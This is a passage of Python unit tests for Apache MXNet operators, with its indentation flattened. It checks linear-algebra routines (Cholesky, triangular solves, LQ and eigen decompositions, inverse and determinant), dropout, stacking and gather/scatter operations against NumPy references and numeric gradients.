inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
        # test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
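    # For A = L * Q with orthonormal rows of Q, the two outputs should be the
    # identity (Q * Q^T) and the reconstruction of A (L * Q).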
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
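    # For the symmetric eigendecomposition A = U^T * diag(lam) * U, the outputs
    # should be the identity (U * U^T) and the reconstruction of A.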
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU: these tests need CUDA 8,
    # while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
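    # NumPy reference for the backward pass of linalg.syevd: combines the
    # gradients w.r.t. U and lam into the gradient w.r.t. the symmetric input.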
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU: syevd needs CUDA 8,
    # while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
    # Currently disabled on GPU: syevd needs CUDA 8,
    # while the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: the test fails intermittently when cuDNN is on; cuDNN stays disabled until this is fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Sanity-check the test data: the input must not contain any zeros
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative error between input and output sums should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
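        # During training the kept activations are scaled (by 1/ratio here) so the
        # expected sum is preserved; at inference dropout acts as the identity
        # unless mode='always' is used.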
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
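        # With axis-wise (broadcast) dropout the same mask is shared along the
        # given axes, so every slice along a dropped axis must be identical.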
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
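    # Compare forward and backward of a unary operator against its NumPy
    # reference at the given dtype and tolerances.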
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
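    # NumPy reference of smooth-L1: 0.5 * (sigma * x)^2 for |x| < 1/sigma^2,
    # otherwise |x| - 0.5/sigma^2.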
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
    except ImportError:
        print("Could not import scipy; skipping unit tests for the special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
